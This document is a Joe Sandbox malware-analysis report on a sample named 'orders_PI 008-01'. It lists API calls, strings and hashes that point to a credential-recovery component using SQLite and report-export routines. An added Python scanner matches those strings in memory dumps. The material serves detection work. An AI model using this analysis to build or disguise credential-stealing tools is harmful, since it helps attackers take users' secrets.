                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _snwprintfwcscpy
                                        • String ID: dialog_%d$general$menu_%d$strings
                                        • API String ID: 999028693-502967061
                                        • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                        • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                        • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                        • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                        APIs
                                        • strlen.MSVCRT ref: 00408DFA
                                          • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                        • memset.MSVCRT ref: 00408E46
                                        • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                        • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                        • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                        • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                        • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                        • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$memsetstrlen
                                        • String ID:
                                        • API String ID: 2350177629-0
                                        • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                        • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                        • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                        • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                        • API String ID: 2221118986-1606337402
                                        • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                        • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                        • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                        • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                        APIs
                                        • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                        • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                        • memset.MSVCRT ref: 00408FD4
                                        • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                        • memset.MSVCRT ref: 00409042
                                        • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                          • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcmpmemset$_mbscpymemcpystrlen
                                        • String ID:
                                        • API String ID: 265355444-0
                                        • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                        • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                        • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                        • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                        APIs
                                          • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                          • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                          • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                          • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                        • memset.MSVCRT ref: 0040C439
                                        • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                        • _wcsupr.MSVCRT ref: 0040C481
                                          • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                          • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                        • memset.MSVCRT ref: 0040C4D0
                                        • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                        • String ID:
                                        • API String ID: 4131475296-0
                                        • Opcode ID: b4109fb38cace7b03c62c87583d72b8469db04adbac5cd884980a40196e27448
                                        • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                        • Opcode Fuzzy Hash: b4109fb38cace7b03c62c87583d72b8469db04adbac5cd884980a40196e27448
                                        • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                        APIs
                                        • memset.MSVCRT ref: 004116FF
                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                          • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                          • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                          • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                          • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                          • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                          • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                          • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                          • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                          • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                        • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                        • API String ID: 2618321458-3614832568
                                        • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                        • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                        • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                        • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AttributesFilefreememset
                                        • String ID:
                                        • API String ID: 2507021081-0
                                        • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                        • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                        • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                        • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                        APIs
                                        • AreFileApisANSI.KERNEL32 ref: 004174FC
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                        • malloc.MSVCRT ref: 00417524
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                        • free.MSVCRT ref: 00417544
                                        • free.MSVCRT ref: 00417562
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                        • String ID:
                                        • API String ID: 4131324427-0
                                        • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                        • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                        • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                        • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                        APIs
                                        • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                        • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                        • free.MSVCRT ref: 0041822B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: PathTemp$free
                                        • String ID: %s\etilqs_$etilqs_
                                        • API String ID: 924794160-1420421710
                                        • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                        • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                        • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                        • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                        APIs
                                        • memset.MSVCRT ref: 0040FDD5
                                           • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,<,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                          • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                          • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                        • _snwprintf.MSVCRT ref: 0040FE1F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                        • String ID: <%s>%s</%s>$</item>$<item>
                                        • API String ID: 1775345501-2769808009
                                        • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                        • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                        • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                        • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                        APIs
                                        • wcscpy.MSVCRT ref: 0041477F
                                        • wcscpy.MSVCRT ref: 0041479A
                                        • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                        • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: wcscpy$CloseCreateFileHandle
                                        • String ID: General
                                        • API String ID: 999786162-26480598
                                        • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                        • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                        • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                        • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                        APIs
                                        • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                        • _snwprintf.MSVCRT ref: 0040977D
                                        • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ErrorLastMessage_snwprintf
                                        • String ID: Error$Error %d: %s
                                        • API String ID: 313946961-1552265934
                                        • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                        • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                        • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                        • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: foreign key constraint failed$new$oid$old
                                        • API String ID: 0-1953309616
                                        • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                        • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                        • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                        • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                        APIs
                                        Strings
                                        • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                        • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                        • unknown column "%s" in foreign key definition, xrefs: 00431858
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                        • API String ID: 3510742995-272990098
                                        • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                        • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                        • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                        • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
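The String ID fields of the functions above are more useful than the fuzzy hashes when you have to find this credential-recovery component in another dump: "etilqs_" is SQLite's Windows temp-file prefix, the "foreign key ..." texts are SQLite error messages, and the `<%s>%s</%s>` / `<item>` / `*.csv` / `*.htm;*.html` / `Error %d: %s` literals belong to the report-export routine that the wide-string calls (_snwprintf, wcscpy) build. The scanner below is an added example, not part of the Joe Sandbox report or of the analysed sample; the grouping of the strings into "sqlite" and "nirsoft_export" components and the two-hit threshold are this example's assumptions, and the embedded dump is a constructed byte string, not memory from the sample.

```python
"""Scan a memory dump (or a PE on disk) for the string indicators listed in
the function summaries above and name the component(s) they point at.
Added example with a constructed sample dump; it runs offline."""
import re
from typing import Dict, List, Set

# Indicator strings copied from the report's "String ID" fields. The grouping
# into components is this example's assumption, not the report's.
INDICATORS: Dict[str, List[str]] = {
    "sqlite": [
        "etilqs_",                          # SQLite's Windows temp-file prefix
        "foreign key constraint failed",
        "unknown column \"%s\" in foreign key definition",
    ],
    "nirsoft_export": [
        "<%s>%s</%s>",                      # XML element formatter
        "<item>",
        "</item>",
        "*.csv",
        "*.htm;*.html",
        "Error %d: %s",
    ],
}


def encodings(s: str) -> List[bytes]:
    """A literal may sit in the binary as ANSI or as UTF-16LE; the export
    strings are wide (they are consumed by _snwprintf/wcscpy above)."""
    return [s.encode("ascii"), s.encode("utf-16-le")]


def scan_indicators(data: bytes) -> Dict[str, List[int]]:
    """Return {indicator: [byte offsets]} for every indicator present."""
    hits: Dict[str, List[int]] = {}
    for group in INDICATORS.values():
        for s in group:
            offs = [m.start() for enc in encodings(s)
                    for m in re.finditer(re.escape(enc), data)]
            if offs:
                hits[s] = sorted(offs)
    return hits


def classify(hits: Dict[str, List[int]], min_per_group: int = 2) -> Set[str]:
    """Name a component only when at least min_per_group of its indicators
    hit, so a lone '*.csv' in a benign binary does not trip the rule."""
    found: Set[str] = set()
    for name, group in INDICATORS.items():
        if sum(1 for s in group if s in hits) >= min_per_group:
            found.add(name)
    return found


def scan_file(path: str) -> Set[str]:
    """Convenience wrapper for a real dump or PE on disk."""
    with open(path, "rb") as f:
        return classify(scan_indicators(f.read()))


# Constructed sample dump (not bytes from the real sample): ANSI SQLite
# strings, filler, then the wide export strings.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"%s\\etilqs_\x00foreign key constraint failed\x00"
    + b"\x90" * 32
    + "<%s>%s</%s>".encode("utf-16-le") + b"\x00\x00"
    + "<item>".encode("utf-16-le") + b"\x00\x00"
    + "*.htm;*.html".encode("utf-16-le")
    + b"\xcc" * 8
)

if __name__ == "__main__":
    h = scan_indicators(SAMPLE_DUMP)
    for s, offs in h.items():
        print(f"{s!r:50} at {[hex(o) for o in offs]}")
    print("components:", sorted(classify(h)))
```

Run it against the .sdmp files listed under Memory Dump Source with scan_file(path); a dump that only trips the "sqlite" group is just as likely a legitimate application embedding SQLite, which is why the export-format strings are kept as a separate group.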
                                        APIs
                                        • memset.MSVCRT ref: 0044A6EB
                                        • memset.MSVCRT ref: 0044A6FB
                                        • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                        • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpymemset
                                        • String ID: gj
                                        • API String ID: 1297977491-4203073231
                                        • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                        • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                        • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                        • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                        APIs
                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                        • free.MSVCRT ref: 0040E9D3
                                          • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??3@$free
                                        • String ID:
                                        • API String ID: 2241099983-0
                                        • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                        • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                        • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                        • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                        APIs
                                        • AreFileApisANSI.KERNEL32 ref: 00417497
